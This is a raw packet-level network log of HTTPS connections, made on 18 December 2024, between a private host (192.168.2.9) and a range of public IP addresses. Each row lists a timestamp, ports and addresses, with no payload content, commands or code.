Dec 18, 2024 21:09:33.370939970 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.371501923 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.371598959 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.374109030 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.374403954 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.374419928 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.375602961 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.375976086 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.376169920 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.514420033 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.514693022 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:34.259855032 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.260133028 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.260163069 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.261389017 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.261745930 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.261936903 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.263164043 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.263360977 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.263379097 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.264560938 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.265006065 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.265191078 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.314573050 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.314749956 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.693155050 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.693236113 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.693303108 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.693303108 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.694224119 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.694241047 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.753535032 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.753638029 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.754096985 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.754101992 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756246090 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756253004 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756352901 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756365061 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756371021 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756375074 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756412029 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756417036 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756458998 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756469965 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756484032 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756494045 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756561041 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756573915 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:34.756582022 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:34.756588936 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:35.415227890 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:35.415260077 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:35.415626049 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:35.415716887 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:35.415725946 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:35.689802885 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:35.689837933 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:35.689970970 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:35.690174103 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:35.690190077 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:35.690463066 CET	49705	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:35.690495014 CET	443	49705	23.206.229.209	192.168.2.9
Dec 18, 2024 21:09:35.690540075 CET	49705	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:35.690902948 CET	49817	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:35.690931082 CET	443	49817	23.206.229.209	192.168.2.9
Dec 18, 2024 21:09:35.691164017 CET	49817	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:35.691464901 CET	49817	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:35.691478014 CET	443	49817	23.206.229.209	192.168.2.9
Dec 18, 2024 21:09:36.001384974 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.001418114 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.001487970 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.001714945 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.001734018 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.261775017 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.261899948 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.261925936 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.261971951 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.261982918 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.262052059 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.263525963 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.263540030 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.538902998 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.538957119 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.539036989 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.539277077 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.539289951 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.827925920 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.828020096 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.828593969 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.828603029 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.831651926 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.831671000 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.831743002 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.831758022 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.831764936 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.831768990 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.831847906 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.831860065 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.831871986 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.831878901 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.831978083 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.831995964 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832215071 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832227945 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832237959 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832248926 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832297087 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832309008 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832333088 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832345009 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832354069 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832360029 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832370996 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832381010 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832425117 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832438946 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832458019 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832468987 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832480907 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832492113 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832539082 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832550049 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832566977 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832583904 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832595110 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832602024 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832618952 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832624912 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.832660913 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:36.832665920 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:36.902160883 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.902415991 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.902432919 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.902834892 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.903239012 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.903331041 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.956651926 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.027338982 CET	443	49817	23.206.229.209	192.168.2.9
Dec 18, 2024 21:09:37.027420998 CET	49817	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:37.240964890 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.241486073 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.241503954 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.241849899 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.242213011 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.242278099 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.283952951 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.773658991 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:37.815330982 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:37.948717117 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.948914051 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.949328899 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.949347019 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.951329947 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.951345921 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.951390028 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.951407909 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.951423883 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.951436996 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.951540947 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.951569080 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.951700926 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.951735020 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952239990 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952260971 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952330112 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952361107 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952389956 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952404022 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952424049 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952439070 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952439070 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952451944 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952460051 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952470064 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952478886 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952495098 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952496052 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952503920 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952507019 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952516079 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952538013 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952553988 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952558041 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952570915 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952589035 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952615023 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952630997 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952641964 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952665091 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952665091 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952677011 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952686071 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952702045 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952713966 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952730894 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952742100 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952759981 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952768087 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952810049 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952827930 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952855110 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952867031 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952882051 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952894926 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:37.952900887 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:37.952907085 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:38.031666994 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:38.031709909 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:38.031826973 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:38.031981945 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:38.031991005 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:38.371917963 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:38.372381926 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:38.372543097 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:38.373780012 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:38.373801947 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:38.693646908 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:38.693764925 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:38.693857908 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:38.694050074 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:38.694084883 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:38.890892029 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:38.890963078 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:38.890973091 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:38.891001940 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:38.891048908 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:38.891063929 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:38.892061949 CET	49815	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:38.892075062 CET	443	49815	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:39.066648960 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:39.066690922 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:39.066756964 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:39.067070007 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:39.067086935 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:39.347109079 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:39.347177982 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:39.347253084 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:39.347809076 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:39.347856045 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:39.347906113 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:39.348108053 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:39.348140955 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:39.348412037 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:39.348428965 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:39.348860979 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:39.348898888 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:39.348977089 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:39.349351883 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:39.349373102 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:39.350255966 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:39.350289106 CET	443	49841	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:39.350500107 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:39.350678921 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:39.350701094 CET	443	49841	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:39.585656881 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:39.585706949 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:39.585884094 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:39.586102009 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:39.586117029 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:39.786704063 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:39.787169933 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:39.787194014 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:39.788321018 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:39.788470030 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:39.789391041 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:39.789478064 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:39.789604902 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:39.789614916 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:39.789635897 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:39.789695024 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:39.830741882 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:40.106782913 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.107333899 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:40.107352972 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.107744932 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.110485077 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:40.110579967 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.110830069 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:40.121874094 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.121943951 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.121961117 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.122026920 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.122716904 CET	49820	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.122734070 CET	443	49820	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.155344009 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.358524084 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:40.358800888 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:40.358865023 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:40.359467983 CET	49827	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:40.359488010 CET	443	49827	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:40.552537918 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.552613020 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.552737951 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:40.555738926 CET	49835	443	192.168.2.9	108.139.47.50
Dec 18, 2024 21:09:40.555783987 CET	443	49835	108.139.47.50	192.168.2.9
Dec 18, 2024 21:09:40.562304020 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.563570976 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.563587904 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.565063000 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.565129995 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.565828085 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.568731070 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.568763018 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.568849087 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.568936110 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.572767973 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.572834969 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.574467897 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.574549913 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.612696886 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.612704992 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.620871067 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:40.621095896 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:40.621121883 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:40.621619940 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:40.621987104 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:40.622064114 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:40.622241020 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:40.627809048 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.627831936 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:40.658123970 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.663336039 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:40.675098896 CET	49838	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:40.845102072 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.845143080 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.845312119 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.846642971 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.846658945 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.888470888 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.889116049 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.889142036 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.890794992 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.890851974 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.892199993 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.892318964 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.893341064 CET	443	49841	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.893551111 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.893577099 CET	443	49841	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.894850969 CET	443	49841	204.79.197.219	192.168.2.9
